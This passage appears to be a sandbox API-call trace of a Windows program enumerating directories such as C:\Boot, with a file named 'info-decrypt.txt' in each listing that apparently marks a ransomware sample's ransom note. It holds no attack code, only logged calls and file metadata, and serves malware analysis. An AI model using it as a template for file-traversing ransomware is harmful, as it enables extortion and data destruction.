lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0130.756] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0130.756] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0130.756] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0130.756] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0130.756] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0130.757] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccd7780, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0130.757] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0130.757] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0130.757] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0130.757] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0130.758] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0130.758] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0130.758] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0130.758] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0130.758] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0130.759] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0130.759] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0130.759] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0130.759] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0130.759] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0130.760] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0130.760] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0130.760] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0130.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f2bc) returned 1 [0130.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f2c8) returned 1 [0130.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2fc) returned 1 [0130.760] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x6a7ee04, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0130.760] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x6a7edd8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0130.760] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x6a7f024 | out: lpFindFileData=0x6a7f024*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0130.761] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.251] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0131.251] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0131.251] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0131.251] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0131.251] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0131.252] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0131.252] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0131.252] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0131.252] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0131.252] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.252] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0131.253] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0131.253] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0131.253] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0131.253] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0131.253] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccd7780, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0131.253] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0131.253] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0131.253] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0131.254] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0131.254] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0131.254] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, 